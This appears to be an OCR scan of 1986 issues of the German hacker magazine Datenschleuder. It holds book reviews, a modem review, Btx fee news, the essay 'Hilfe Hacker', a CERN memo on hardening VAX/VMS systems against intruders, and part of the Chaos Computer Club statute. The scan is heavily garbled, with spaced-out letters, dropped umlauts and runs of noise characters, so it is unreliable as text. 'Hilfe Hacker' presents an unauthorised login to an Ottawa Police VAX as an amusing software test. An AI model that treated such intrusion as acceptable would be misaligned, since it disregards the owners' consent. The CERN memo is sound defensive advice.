o , V e r p a c k u n g , T r i n k g e l d -fr d e n Versand erfolgt Seideingang. With were und in -folgender an -frhestens nach

Johannes G u t e n b e r g 101 M o n e y - s a v i n g secrets Your Phone C o m p a n y W o n ' t Tell You


101 Money-Saving Secrets Your Phone Company W o n ' t Tell You "Written in the same irascible style as Teleconnect Magazine (CQ41-113) which Newton publishes, 101 Secrets is mostley about cutting your phone expenses without losing any service. Some of the methods are Machiavellian deliberately mess up the quality of your phone lines, for instance, so your employees spend less time on the phone." schreibt Art Kleiner in der Whole Earth Review Winter 1985 ber das Buch von Harry Newton 1983,94 S.. ca. 10 US Johannes Gutenberg. In seinem Buch ber Gutenberg schrieb Matthias Geske: Gutenberg; "Ich will eine Buchwerkstatt begrnden wie diese hier. Die Menschen brauchen Bcher.,.." "Verrennt euch nicht!" unterbrach ihn der Abt scharf. "Ihr mgt schon recht haben mit euren b e r l e g u n g e n , . . . Ihr knnt nicht beurteilen, was dem Glauben und der Kirche n t z t . . . . Die Bcher, die wir abschreiben, sind sorgfltig ausgewhlt. Soll den der gemeine Mann om W o r t Gottes herumdeuteln?" Der Autor hat den wenigen bekannten Daten ber das Leben Gutenbergs (aus Mainz verbannt, Schiepulverhandel in Paris, Edelsteinschleifer in Straburg) einiges hinzugefgt. Ihm gelingt dos Portrt eines unruhigen, aufgeweckten Mannes, mehr Erfinder und Entdecker als Buchmensch. Matthios Geske: Johannes Gutenberg. 176 S., Pb. Ab 9 Jahren, anrieh. ISBN 3-89106 Ol 2-2 /ws/buchb215.ws 860322 1934

+>

'S c n

Hackers

i. -o a co "D 3 -I C I -< N E i. U iflJ in e c O II J -m aj m n in j : m O U T D

L oi i + J iL 3 a e L n u n in 0 U (0 n sz iL u

dsHl dsKl0 dsKCC d's A b h dsKop

3,33 3,33 1,00 3,33

DM DM DM DM

S t e v e n Levy

W a r u m der Chef, der ins Telefonsystem seiner Angestellten eine sich automatisch bei Privafgesprchen einschaltenden Strsender einbaut, kein Hocker ist, geht aus dem folgenden Buch hervor. Hackers Das Buch von Steven Levy w a r eine Art Grundlagentext auf der U5- "Hackers Conference 84", deren Ergebnisse ab Seite 23 in der Hackerbibel unter dem M o t t o KEEP DE5IGNING beschrieben sind. Eine ausfhrliche Besprechung soll folgen, hier nur ein paar Zitate zum Thema Hackerethik: '1. Zugriff auf Computer und alles Wissen, was Dir hilft, Vorgnge auf der W e l t zu versthen, mu uneingeschrnkt und umfassend sein. Das Prinzip des Mitmachens gilt berall. 2. Alle Informationen sollten gratis sein. 3. Mitraue Autoritten frdere Dezentralisierung. 4. Beurteile Hacker nach ihrem Handeln, nicht nach berholten Kriterien wie Diplomen, Alter, Rasse oder Stellung. 5. Du kannst mit dem Computer Schnheit und Kunst produzieren. 6. Computer knnen dein Leben positiv ndern. {Ich denke, da wir ohne Computer besser dran wren. Da sie aber in dieser Zeir wichtig sind, mu ich verstehen warum. Der stzer}" {1984,458 S.( ca 17.95, Doubleday and Company, 501 Franklin Ave., Garden City, USA-NY 1153. Die lieferung an uns dauerte vier Monate und kostete etwa 90 DM. Besser ist Anfrage an < buchbe15.ws 860323 0

Buch - Warnung!

M S D O S im D e t a i l
Buchwarnung: MSDOS im Detail. Das Buch erweckt den Eindruck einer umfassenden MSDOSDarstellung, die im Detail falsch ist. Der Haftungsausschlu im Vorwort ist begrndet. Die 10 MB-Platte, auf der diese Datenschleuder erstellt wurde, mute aufgrund von Seite 33 neu formatiert werden. Zitat: "Ein Strfall auf einer Diskette bzw. einer Datei kommt in der Regel sehr selten vor. Sollte ein solcher Fall allerdings eintreten, besteht die Mglichkeit, die Information mit dem RECOVER-Kommando zu berichtigen. . . . Hinweis: In allen RECOVER- Fllen gehen Informationen verloren. Hierbei handelt es sich edoch nur um Teilmengen einer Datei bzw. Diskette." Die bittere Wahrheit: Es sammelten sich nach dem RECOVERLauf 6,7 MB wichtiger Daten in Null Dateien an. Auf der Platte gab es keine Directories mehr, nur 256 einsame Dateien voller wirren Zeugs. RECOVER ist der wohl gefhrlichste MSDOS-Befehl, der nach nur 256 Dateien abstrzen konn und auerdem alle Unterverzeichnisse (Subdirectories) komplett in eine Datei zusammenfat. ; Vor der Lektre des Buches ist zu warnen. P.P.Volzing. MSDOS im Detail, iwt. ISBN 3-88322-142-2 xi/ws/buchb315.ws 860323 1533 Seite 1 4

rt L g Ul C C ,H Ol L Ul Ul h Ich O

PV4 PVT

4,00 777 77

DM DM

Rest

liefere deshalb: V-Scheck DM B r f m a r k n - , 0 5 DM B r f m a r k n - , 5 0 DM B r f m a r k n - , a 0 DM

, , , ,

Inflation, even better buy!

Form: ausilTn! Vrwaltngssche

di?.s s i n d

nusammen

DM

Alls rfordrlch btt sorgfltg Nchts wchtgs uglassn!!! Wr h a b n s e h n g n u g zu t u n mt

Abs Datenschleuder Ausgefllt am:

2HH20

C9927F liier Adresskleber befestigen z w e i t e n a n h e f t e n r.um V e r s c h i c k e n f a l l s ni cli : m i n d . 1 DM T r i n k g e l d A u f s c h l a g -fr M e h r a r b e i t u n d < A d r e s s e hier links lesbar ei n t r a g e n Hier D a t u m s t e m p e l p l a l z fr V e r w a l t u n g V V__ Ausiieferung V V_ Vernichtung <

Formblatteingang

Geldeingang

A r c h i vi e r u n g

(*) L e i t s t e l 1 e n u m m e r u m f a s t m i n d . 4 Z i f f e r n . S t e l l e 1 + 2 i s t T e l - V o r w a h l HM 40, Berlin 30, Kiel 43 usw. W n s c h e werden nach M g l i c h k e i t erfllt.

Datenschleuder Seite
2579 ia. >1.1) 1 5 = M r z 1 9 8 6

Postvertriebstck C3927F

DM 2,50

Total Telecommunications
c

Emsteckmodem fr den C64

T*TX0 f*f* n ftrnJflw ijn|tt*

In RuWri U Jthr 1W3 orH'-illeh rat(*|n i


r i r s l d i u J ( | n ( i t i i i lo r i m j l i t u i H | lufera, l * * * r tUvpTcniehlui 2)1 2371 a

i nicht |nhalgt*n

Optekeppt fiioMsa. r.*, I . I U M .

'Ol Si0'.

dt Opto*oppil

tx-Oe Bokel Zum 1. Juli will die POST die Speicher und Verkehrsgebhren fr das Bldeltextsystem zu 50% erheben, verlautet aus dem Postministerium. Fr den CCC bedeutet das, da der jetzige Programmumfang mit ber 2000 Btx-Seiten ca. 3000 D M pro Monat kosten und dann nicht mehr ber das Spendenaufkommen der Btx- Seiten finanziert werden kann. Neben dem CCC werden viele kleinere Informationsdienste sofern es sich nicht um Werbung oder Telefonsex (der Chef bezahlt via Telefonrechnung!) handelt ihre Informationsprogramme sehr einschrnken, in vielen Fllen gor aufgeben mssen. Dadurch wird Btx die derzeit wohl teuerste ,Wunschmaschine" (ED007). Die neue Software, die eine Gebhrenerhebung erst ermglicht, ist in einigen Punkten noch verbesserungswrdig. Zwar gibt es ein neues Identifizierungsverfahren; man bentigt fr jede wichtige Funktion ein neues Kennwort (ideal fr Mtter und Vter von fnf Kindern), jedoch geht die neue Version zu Lasten der Vergtungsabrechnungen. Btx-Teilnehmer und Anbieter erhalten keine aktuellen Hinweise mehr ber ihr Gebhrenaufkommen, die Abrechnung geschieht monatlich (oder spter). Der CCC berarbeitet seit geraumer Zeit sein Btx-Programm nur noch zu aktuellen Anlssen. Der Club wird sein bisheriges Programm zum 15. Juni lschen und ein neues Sparprogramm mit circa 200 Informationsseiten anbieten. Um den Abruf, wie bisher, auch von ffentlichen Gerten zu ermglichen, werden keine Abrufgebhren erhoben. W i r hoffen auf ein kostendeckendes Spendenaufkommen ber Industriegerte. Mit Erstaunen wurde in der Btx-Redaktion das Informationsangebot zu Datenschutz und Datensicherheit" der POST zu Anfang Mrz aufgenommen. Fachleute forderten schon vor geraumer Zeit (d$3 Mrz 84, HaSpa-Coup November 84), da die Post die Verbraucher oufklren mu. Verbroucheraufklrung wurde von der POST vergessen. Die Werbestrategien wurden fnf Jahre im voraus geplant. Die Post zeigte hier eine Flexibilitt, die jede andere Firma in dh Ruin getrieben htte. Den 40.000 tx-Teilnehmern kndigt sich ein aus Prestel-Zeiten bekanntes Problem an. Mit Einfhrung der AlphaGeometrie (GraphiklevelJ bentigen die Teilnehmer, die weiter Vorne (!) bleiben wollen, auch neue Decoder. Die alten knnen Alphageometrie nicht darstellen und Jossen sich auch nicht umrsten. Um diese Tafsache dem Teilnehmern noch zu verheimlichen empfiehlt die POST Btx-Seiten des neuen Standorts nur in geschlossenen Benutzergruppen anzubieten. Is23 btxl5.wi

Totol Telecommunications Einsteckmodem frC64 Auch om DBP-Telefonnetz bewhrt sich dos TT-Modem fr unter D M 150. Die Anschlustrippe entspricht zwar dem amerikanischen Telcom-Standard, die mit deutschen Anschlunormen nichts gemein hat. Treibersoftware gibts gegen Aufpreis, allerdings nur eine mhsam aus dem amerikanischen adaptierte Version. Technisch ist das Modem sauber aufgebaut, ohne exotische Bauteile und recht bersichtlich. Der Userportstecker fhrt die wichtigsten Daten- und Steuersignale zum Rechner, als da sind: RxD, TxD, DCD, Ring Indicotor sowie ein Steuersignal zum Anschalten und Whlen. Erfreulicherweise wurde die Belegung so gestaltet, da das Modem sich ohne Probleme mit Standardprogrammen wie VIP-Term oder Vidtexf benutzen lt. Mailboxbetrieb ist auch mglich (sollte aber wegen der POST unterlassen werden), bei einigen Standardprogrammen sind allerdings Anpassungen ntig. Leider beschrnken sich die Obertrogungsfhigkeiten des Gertes auf CCITT V.21, also 300 Boud. mit automatischer Answer/Origiriate- Erkennung. Fr Otto-Normaluser, der sich auf die Datenkommunikation mit lokalen Telefonboxen beschrnkt oder eine solche betreiben will, ist dos vllig ausreichend und das Total Telecommunications Modem arbeitet hier sauber und zuverlssig. Als Treibersoftware wird vom Importeur ein Terminalprogramm angeboten, dos die Stondardfunktionen bietet, nicht mehr. Allerdings ist die Bedienung elwas umstndlich, ein Untermen jagt das nchste, und man verpat leicht die wichtigen Funktionen. Dies wird durch das mehr als ausfhrliche Handbuch ausgeglichen, dos auch eine recht gelungene Einfhrung in dos TT-Datenbanksystem bietet, welches allerdings fr bundesrepub'ikanische User schwer erreichbar sein drfte, da es nur auf dem nordamerikonische Kontinent prsent ist. Fazit: ein recht brauchbares und preiswertes Modem, wenn man gewillt ist, sich auf 300 Bd zu beschrnken. Auf das angebotene Terminalprogramm kann mon getrost verzichten. Fr BIM-kompatible Rechner liefert die Firma RESCO (Augsburg 0821 - 524033) auch ein Modem mit V.24 Dose. Die zugehrige Software (inkl. unter D M 200,-) kann komfortable Makros abarbeiten und gestattet kennwo^tgeschtzten Fernzugriff, totoltl 5 860215 1358 gobiin

Nunner 16

HILFE HACKER

Septenber 198G

D i e s e r Hilferuf hallt d u r c h m a n c h e n O p e r a t o r r a u m In d e n R e c h e n z e n t r e n u n s e r e r W e l t . D o c h u m M i v e r s t n d n i s s e n gleich v o r z u b e u g e n : In d e n U S A ist d i e s e r Ruf e t w a s a n d e r s z u interpretieren als in d i e s e m u n s e r e m L a n d e . S o b e d e u t e t "Hilfe H a c k e r " in d e r B R D eifriges G e l a u f e m e h r o d e r w e n i g e r k o m p e t e n t e r Pers o n e n d u r c h v e r w i n k e l t e G n g e im R e c h e n zentrum, faszinierte und/oder bestrzte G e s i c h t e r v o r wild b l i n k e n d e n M a s t e r k o n s o l e n , s c h i m p f e n d e P u t z f r a u e n , d i e sich d u r c h B e r g e von Printouts k m p f e n und Hab-ichs-nichtg l e i c h - g e s a g t Blicke frustrierter B e t r i e b s r t e , bis e i n e r auf d i e I d e e k o m m t , d e n 2 2 0 V - R e s e t durchzufhren, d e r auch d e n hartnckigsten H a c k e r auf die Erde zurckholt ( D A T E X - P : A u s l o e s u n g - G e g e n s t e l l e eingeschl&fen). In d e n U S A w e r d e n H a c k e r mit e t w a s a n d e r e n A u g e n betrachtet, wurde doch der Nutzeffekt der P h r e a k s schon vor J a h r e n erkannt (Viva C h e s h i r e !), j a , d i e e r s t e n H a c k e r h a b e n e i n e r e g e l r e c h t e T e l l e r w s c h e r k a r r i e r e hinter sich u n d l e i t e n jetzt d i e j e n i g e n K o n z e r n e , d i e die j a so h a c k e r f r e u n d l i c h e n R e c h n e r d e r N a c h f o l g e g e n e r a t i o n p r o d u z i e r e n . In D e u t s c h l a n d ist so e t w a s m o m e n t a n n o c h u n d e n k b a r , die liberale D e n k w e i s e scheitert wieder mal a m Konservatismus. Gerade ein (Kommunikations-)Entwicklungsland wie das U n s r i g e sollte a u c h D e n k a n s t e n a u s H a c k e r k r e i s e n G e h r s c h e n k e n : e s k a n n nur v o n V o r t e i l s e i n , d e n n b e i u n s w r e n H a c k e r noch billig z u b e k o m m e n (vgl. U S A ) , w e n n nicht u m s o n s t , d e n n e s z e i c h n e t sich e i n e S y m b i o s e a b : d e r H a c k e r g e m d e r P h i l o s o p h i e "ffne! Impressum i D i D a t e n s c h U u d s r 14, I I . Sep 1994. -Das W i s s e n s c h a f t l i c h e F a c h b l a t t fuer D a t e n r t i s e n d e D-2aaa H a m b u r g 2B S c h w e n c k e s t r a w 85 GeonetiGeol:Chaos-Ta* Btx i 6 5 5 3 2 1 1

.v.'.v.v.v.v.y.v.

!!!'

'v

a *.<

l i i r

M
i.i
.1, i #

mm

iOi

Herausgeber und ViSdPGi Herwart Holland-Koriti M i t a r b e i t e r dir A u s g a b e tu.a.) R . S c h r u t z k i , S . tfrnry, A . E i c h l i r , P. Franck, H. Grutl, H. K u e h n . , Andy M . - M . , S. Stahl Eignifrucli in S t l b i t v * r J g . Septfflbsr 1986.

I T

. .V.V.'.V.'.' <

m^immMmmm

. . . . .'.W.V.V.V.V.V.V.V.V.V.V,

. j s m m ^ . , t i * t # i * i it.

ker!!" interpretiert werden,

die N e t z e - D e z e n t r a l i s i e r u n g d e r Information" freut sich ber j e d e s P a s s w o r t , d e r Betreiber kann seinen Rechner vor wahren Gefahren ( d u r c h C r a s h e r , Wirtschattkriminalitt u s w . ) d u r c h e r f a h r e n e H a c k e r s c h t z e n lassen. Nicht zu v e r a c h t e n d e r Lerneffekt, d e n n spielerisch lsst e s sich nun e i n m a l leichter l e r n e n , und B i l d u n g s f r d e r u n g n i m m t d e r S t a a t ja fr sich in A n s p r u c h . In d e r Realitt sieht es leider n o c h so aus: S o f t w a r e t e s t s auf G r o r e c h e n a n l a g e n w e r d e n v o n H a c k e r n in E i g e n r e g i e d u r c h g e f h r t . S o k o n n t e m a n d a s auf d e r C e B i t vorgestellte P r o g r a m m p a k e t A L L - I N - 1 ( a l l e s eins, konz e p t i o n e l l mit L o t u s - 1 - 2 - 3 auf P e r s o n a l s v e r g l e i c h b a r ) fuer V A X - R e c h n e r v o n D E C a u c h im p r a k t i s c h e n E i n s a t z auf e i n e m R e c h n e r in Ott a w a bewundern. Unter d e m U s e r n a m e n O P F k o n n t e n die V o r z g e d e s P r o g r a m m p a k e t e s mit e i n e m V T - 1 0 0 E m u l a t o r u n d e i n e r D a t e x v e r b i n d u n g g e n a u e s t e n s untersucht w e r d e n . E h e r zufllig stiess m a n bei d e m inoffiziellen S o f t w a r e t e s t auf die D a t e n b a n k d e f i n i t i o n d e r O t t a w a Police F o r c e ( e b e n j e n e r o m i n o e s e O P F ) fr e i n R a s t e r f a h n d u n g s s y s t e m (suspic i o u s flag = f a l s e ) . D e r T e s t fiel v o n H a c k e r s e i l e h e r recht positiv a u s , die G e g e n s t e l l e antwortet allerdings bis h e u t e nicht ( k o m m e n t a r l o s e r R a u s s c h m i s s ) . U e b e r h a u p t z e i g e n sich R e c h n e r h e r s t e l l e r recht u n k o o p e r a t i v g e g e n b e r H a c k e r n , z u m i n d e s t e n s , w a s g r e r e Konz e r n e a n g e h t ( " W o z u h a b e n wir u n s e r e t e u e r b e z a h l t e n S p e z i a l i s t e n " ) . Ein weit u m h e r g e reister H a c k e r b e w e i s t i n n e r h a l b v o n M i n u t e n , d a d a s G e l d f u e r t e u r e S p e z i a l i s t e n sinnvoller angelegt w e r d e n knnte, z.B. zur Finanzierung e i n e r Niui fr W e i t e r b i l d u n g s z w e c k e ( T e i l n e h merksnnung dBildung sehraktiv). Datenreisen bleibt i m m e r n o c h e i n e t e u r e A n g e l e g e n h e i t , es b e g i n n t s c h o n bei d e n P o s t d i e n s t e n . W i r warf e n n o c h auf Billigreisen, s e i e s nun n a c h N e c k e r m a n n s c h e m a ("3 W o c h e n S o n n e im Bitnet") o d e r R a i n b o w - T o u r s ("2 1 / 2 T a g e S u p e r s t i m m u n g im F e r m i l a b " ) , w a r u m nicht ffentliche D a t e n b a n k - T e l e f o n z e l l e n mit T e r m i n a l u n d G e l d e i n w u r f ( O r t s g e b h r v e r s t e h t sich, u n d k o m m t mir jetzt nicht mit Bldeltext)! E s gibt n o c h viel z u t u n in d i e s e m u n s e r e m L a n d e , e s s i n d die H a c k e r , d i e sich a u f r a f f e n u n d die Betreiber z u m Handeln zwingen! Denn der Hilferuf soll in Z u k u n f t nicht a l s "Hilfe wir h a b e n H a c k e r ! " , s o n d e r n als "Hilfe, w i r b r a u c h e n H a c -

DS1GHILFHACK.TXT FRIMP 20.04.1986

To From Subject

VMS System Managers SecurityManager Security Against Hackers


intruder tried to pass (as already happens for V X C R N A ) . Closing the E X C I T E / I N D E X gap is equally difficult since it implies closing access irom a set of X 2 5 addresses, s o m e of which might be legitimately employed by valid C E R N users. Most of the following points a r e fully described in the V M S V 4 System Security manua 1 ' T h e most obvious first precaution it, .or all users to have effective passwords. C a s e s w h e r e usern a m e = password should be positively banned. At first sight, the only risk in having such trivial passwords would be the loss or corruption of that user's files. However, once inside the system, a V M S knowledgeable intruder m a y well find other interesting possibilities. V M S is not hacker-proof, especially if s o m e of the following items a r e not respected. A simple D C L c o m m a n d file can be used to check for such useless passwords. However, e v e n this rule is not sufficient. Using first names as passwords is almost equally useless; or initials; or IBM login codes. System managers should enforce minimum length passwords, say a minimum of 5 characters. In the limit, the use of password expiry times might b e necessary, forcing regular changes of password. This last item, forcing password changes, might be thought to reduce the user-friendliness of V M S (as d o most of the suggestions in this paper), but it would be useful to trace accounts unused for a long time; these are exactly the accounts that h a c k e r s p i c k o n to adapt for their own use. W h e r e a user has s o m e special privilege (and this should b e kept to a minimum), such regular changes should be enforced a n d perhaps the minimum length should b e longer. Apart from t h e obvious privileges to be careful with ( S E T P R V , S Y S * , C M K R N L , B Y P A S S , O P E R , etc) a r e D E T A C H and R E A D A L L . T h e first gives its owner the possibility to issue a R U N / U I C = c o m m a n d w h e r e the U I C could be a system !DI T h e second gives write access to all file headers, thus allowing its owner to change a file protection, for example. * Users should N O T k e e p passwords in files on disc, for example to help them log In to another V A X across the network. This compromises not only the account being hacked, but the corresponding V A X also. * S o m e terminals allow their owners to store character strings in memory to be activated on a single or multiple keystroke(s). Unless you can be sure that your terminal is totally secure (either in a permanently locked office or at home and out of reach of the children!!), then you should not store login sequences in the memory of your terminal. * T h e B A C K U P program stores the command string used to create a backup save set in the save set itself. If you use D E C N E T to create a backup save set a n d you include the username and password in the c o m m a n d string in the form node"username password"::... then the password will appear in clear text In the s a v e set. W e have complained to t h e author of B A C K U P about this but

Recently, w e h a v e s e e n a number of occurrences of people logging in to C E R N V A X s via unauthorised accounts a n d establishing n e w accounts for themselves or altering existing accounts for their own use. Last year, tnis h a p p e n e d mainly to the V X G I F T machine a n d on two occasions, time w a s lost alter malicious d a m a g e w a s done. Since the start of February, V X C R N A has b e e n the main target, but not the only o n e ; V X D E V , V X M E R L , V X O M E G h a v e b e e n affected also. On V X C R N A , the effects have b e e n less severe in terms of actual damage (although at least one system crash can be traced to tne running of a privileged program by the intruder). However, several members of the support t e a m have had to spend a lot of time investigating these incidents and repairing the d a m a g e a n d a few users have had their accounts m a d e temporarily unavailable when t h e Intruder(s) c h a n g e d the password or w h e n the support t e a m suspended access to them after they h a d b e e n used to enter the V A X . W e will leave aside for now the question of how such "hackers" first g e t access to privileged accounts in a given machine. O n c e they get such access, these people a r e very knowledgeable about V M S a n d they can set themselves up many other w a y s into t h e system. It has taken much effort to reach t h e stage w h e r e w e now believe that they can do no further harm inside V X C R N A a n d even n o w , w e a c c e p t t h a t t h e r e m a y still be w a y s in which they can log in. W h o a r e these people a n d how d o they access C E R N . Apart from the occasional hacker who m a y b e a user on s o m e connected system who gets b o r e d late at night a n d tries to sea what ha can r e a c h a n d w h a t fun h e c a n have, there seems to be a club b a s e d in G e r m a n y called the "chaos club" w h o s e collective hobby is hacking systems conn e c t e d to public X 2 5 networks. W e h a v e identified o n e m e m o e r of this club in Dusseldorf and the "working alias" of a s e c o n d in Berlin. W e are currently investigating w h a t steps w e c a n take to curtail their anti-social activities. T h i s p a p e r i i s t s a f e w h i n t s o n h o w to m a k e systems a little m o r e secure. It must b e e m p h a s i s e d that A L L C E R N systems must b e protected. T h e people doing this hacking a r e very ingenious. T h e y know all about networks. W e h a v e s e e n evidence that they enter C E R N via one s y s t e m a n d use D E C N E T to get to their real target system. E v e n If all C E R N s y s t e m s w e r e fully protected, it might not be e n o y g h . T h e r e w o u l d still remain two large g a p s through w h i c h they might pass. O n e is via tne C E R N E X C I T E network w h e r e t h e y would log into I N D E X a n d then connect to a n y V A X ; the second is through a system outside C E R N , f o r e x a m p l e , on I N F N E T a n d then into C E R N via D E C N E T . Stopping the s e c o n d of these might b e possible if w e e n c o u r a g e the s y s t e m m a n a g e r s of all systems on the network to take the s a m e steps a s described In this note with the threat that w e would b e obliged to close t h e link to a n y system though which an

there is little chance of a solution. ' From time to time, bugs or security gaps are reported in particular versions of V M S . T h e s e should be closed a s soon as a fix is available. For example, under V M S x.x, any user in the system can xxxxxxxxxxxxxxxxxxxxxxxxx to the system xxxxxxxxxxxxxxxx(andonother xxxxxxx xxxxxxxxxx in the system). This is e q u i v a l e n t s the xxxxxx xxxxxxxxx and can lead to abuse. T h e published protection against this is to set the following command into the xxxxxxxxxxxxxxxxxxxxxxxx Sxxxxxxxxxxxxxxxxxxxxx $xxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx This bug is fixed in V M S x.x. * System managers might consider restricted access to certain privileged accounts during nights a n d weekends. This is easy to implement using the primary/secondary options in the authorisation file a n d a c o m m a n d file run at regular times. Accounts such as xxxxxxx and xxxxxxxxxxxx should allways be disabled w h e n not in active use a n d their passwords should allways be changed from the V M S default. However, does the S Y S T E M account need to be open all w e e k e n d w h e n you know it will not be n e e d e d until Monday? Perhaps such accounts should be disabled for access in N E T W O R K mode o r f r o m D I A L U P lines. A n d so on. A particular case of this is the xxxxx account. In general, xxxxxxxxxxxxxx are not careful with their passwords, especially on a site with m a n y VAXs. it is strongly suggested that xxxxx should be generally disabled unless xxxxxxxxxxxxxx have been called. A trivial c o m m a n d file run by any privileged user ( O P S or S Y S T E M ) could be written to enable it. If you want xxxxx xxxxxxx to b e able to look at your error log without your enabling their account, they could be given a non-privileged account and access to the error log via an access control entry. While xxxxxxxxxxxxx might (will) not like this, it is standard practice in many Digital offices as well as at s o m e user sites. * S o m e files shouldbe protected by security access control entries such that certain types of access to them a r e logged. Examples would be S Y S U A F . D A T , V M S I M A G E S . D A T , the N E T * . D A T files in S Y S $ S Y S T E M , all page, s w a p and dump files. All thes files have no n e e a t o have any "world" access, not e v e n read. T h e R I G H T S L I S T . D A T file however, does n e e d world-read access but could have an access control entry for other types of access. Finally, any xxxxxx and xxx xxxxx xxxxx should have no world access since they m a y xxxxxxx xxxx xxxxxxxxx. ' S o m e images may be left generally accessible but installed with accounting selectively enabled so that their use Is recorded. Examples here would Include I N S T A L L . N C P , A U T H O R I Z E , A C C O U N T I N G . T h e aim is not to stop them being used (a clever hacker could easily get round this) but to be able to s e e w h e n they are used a n d by whom. * T h e various V M S xxxxxxxx xxxxxx should be xxxxxxx. T h e s e will log breakin attempts, changes to the authorisation file a n d so on. T h e s e can be linked to CERN-wrltten programs which will, for example, kill any unauthorised process which tries

to change the authorisation file, close a D E C N E T link which is being used to hack the system, send warning messages to a given account or accounts w h e n such incidents occur; a n d so on. These programs are available from xxxxxxxxxxx * If you have xxxxxxxxxxxxxx*, your system could be used as a"port of entry"forthese hackers. There exists a standard xxxxxx utility called xxxxxxxxxxxx which will allow the system manager to set up a list of D T E (X25 addresses) to or from which calls are allowed or excluded; a list of users who are allowed to use X 2 5 to gain access to or from a remote system; and a list of "objects" (programs) which are accessible via X 2 5 for remote users. Although this might s e e m a little heavy - and the documentation m a y need to be read several times before? it is understood - X 2 5 system managers are strongly encouraged to consult the xxx documentation for more details on xxxxxxxxxxxx. * Other network products, e.g. J - N E T , may have their own security gaps. W e have done some simple tests on T C P / I P and EAN a n d found the following. In T C P / I P , the system manager can declare server processes. It s e e m s that T C P / I P starts such processes with whatever privilege it itself is Installed with. Since this usually includes C M K R N L , your system is thus vulnerable to simple coding errors by the author of the server, without even considering the dangers of hackers! W e a r e investigating this. E A N has an even bigger loophole. W h e n users register with E A N , they are asked for an EAN password. This is then stored in a file on the users account with a standard n a m e - in clear text. Further, this lile is created by E A N with world read privilege! Although users are requested to choose a different password to their V M S passwords, many use the s a m e password. W e are investigating making this file less accessible. System managers with E A N installed are invited to contact m e for the n a m e of this file. " If you suspect that your system has b e e n hacked, isolate the account used a s soon as possible. Making It xxxxxxx is not enough since batch and network jobs can still pass. Use the xxxxxxxxx qualifier in A U T H O R I Z E . Also, check that the hacker has not altered other records if you suspect he had privilege, xxxxxxxxxxxxx has a trivial comm a n d file to check for this. Finally, check that strange files w e r e not created in the "attacked" account. ( S p e c i a l T h a n x to A . S . )

Vic. 8 Obi
K i n d e r an d i e M a c h t "The reach of children" steht fur "Gef a h r e n z o n e " bei Systeir.-Managern, die Hacken als antisDriale Tatigkeit schildern. Das widerlegt "HilfeHacker" in d i e s e r A u s g a b e . "2 b i s 3?. c f f e n e r , Komiriuni k a t i o n , frei und unzensiert auf a l i e n M e d i e n " fordert MultiMediaGruppe MinusDeltaf. Diesen flnteil h a b en Hacker auf den Rechnersystemen a u c h auf VAXen noch langst nicht erreicht. Hau

Dokunentation % % %
Satzung des Chaos Computer Club
Prflambel
Die Informationsgesellschaft unserer Tage ist ohne Computer nicht mehr denkbar. Die Einsatzmglichkeiten der automatisierten Datenverarbeitung und Datenbermittlung bergen Chancen, aber auch Gefahren fr den Einzelnen und fr die Gesellschaft. Informations-und Kommunikationstechnologien verndern das Verhltnis Mensch-Maschine und der Menschen untereinander. Die Entwicklung zur Informationsgesellschaft erfordert ein neues Menschenrecht auf weltweite ungehinderte Kommunikation. Der Chaos Computer Club ist eine gataktische Gemeinschaft von Lebewesen, unabhngig von Alter, Geschlecht und Rasse sowie gesellschaftlicher Stellung, die sich grenzberschreitend fr Informationsfreiheit einsetzt und mit den Auswirkungen von Technologien auf die Gesellschaft sowie das einzelne Lebewesen beschftigt und das Wissen um diese Entwicklung frdert.

**f Dokumentation xxx


C^j
tragsordnurg, die von der Mitgliederversammlung beschlossen wird. (2) Im begrndeten Einzelfall Kann fr ein Mitglied durch Vorstandsbeschlu ein von der Beitragsordnung abweichender Beitrag festgesetzt werden. 7 Organe des Clubs Die Organe des Clubs sind 1. die Mitgliederversammlung 2. der Vorstand 8 Mitgliederversammlung (1) Oberstes Beschluorgan ist die Mitgliederversammlung. Ihrer Beschlufassung unterliegen 1. die Genehmigung das Finanzberichtes 2. die Entlastung des Vorstandes, 3. die Wahl der einzelnen Vorstandsmitglieder, 4. die Bestellung von Finanzprfern, 5. Satzungsnderungen, 6. die Genehmigung der Beitragsordnung, 7. die Richtlinie ber die Erstattung von Reisekosten und Auslagen, 8. Antrge des Vorstandes und der Mitglieder, 9. die Ernennung von Ehrenmitgliedern, 10-die Auflsung des Clubs. (3) Die Mitgliederversammlung ist beschlufhig, wenn mindestens fnfzehn Prozent aller Mitglieder anwesend sind. Beschlsse sind jedoch gltig, wenn die Beschlufhigkeit vor der Beschlufassung nicht angezweifelt worden ist. (4) Beschlsse ber Satzungsnderungen und ber die Auflsung des Clubs bedrfen zu ihrer Flechtswirksamkeit der Dreiviertelmehrheit der anwesenden Mitglieder. In allen anderen Fllen gengt die einfache Mehrheit. (5) Jedes Mitglied hat eine Stimme. Juristische Personen haben einen Stimmberechtigten schriftlich zu bestellen. (6) Auf Antrag eines Mitgliedes ist geheim abzustimmen. ber die Beschlsse der Mitgliederversammlung ist ein Protokoll anzufertigen, das vom Versammlungsleiter und dem Protokollfhrer zu unterzeichnen ist; das Protokoll ist allen Mitglieder zugnglich zu machen und auf der nchsten Mitgliederversammlung genehmigen zu lassen. 9 Vorstand (1) Der Vorstand besteht aus sieben Mitgliedern: 1. den Vorsitzenden, 2. zwei stellvertretenden Vorsitzenden, 3. dem Schatzmeister, 4. zwei Beisitzern und (2) Vorstand im Sinne des 26 Abs. 2 BGB sinddie Vorstandsmit glieder. Die Vertretungsmacht ist durch Beschlsse des gesam ten Vorstandes begrenzt. (3) Der Vorstand beschlietmitderMehrheit seiner satzungsge men Mitglieder. Sind mehr als zwei Vorstandsmitglieder dauernd an der Ausbung ihres Amtes gehindert, so sind unverzglich Nachwahlen anzuberaumen. (4) Die Amtsdauerder Vorstandsmitglieder betrgt zwei Jahre; Wiederwahl ist zulssig. (5) Der Vorstand ist Dienstvorgesetzter aller vom (6) Der Schatzmeister berwacht die Haushaltsfhrung undverwaltetdas Vermgen des Clubs. Er hat auf eine sparsame und wirt schaftliche Haushaltsfhrung hinzuwirken. Mit dem Ablauf des Geschftsjahres stellt er unverzglich die Abrechnung sowie die Vermgensbersicht und sonstige Unterlagen von Wirtschaft lichem Belang den Finanzprfern des Clubs zur Prfung zur Verfgung. (7) Die Vorstandsmitglieder sind grundstzlich ehrenamtlich ttig; sie haben Anspruch auf Erstattung notwendiger Auslagen im Rahmen einer von der Mitgliederversammlung zu beschlieenden Richtlinie ber die Erstattung von Reisekosten und Auslagen. (8) Der Vorstand kann einen "Wissenschaftlichen Beirat" einrich ten, der fr den Club beratend und 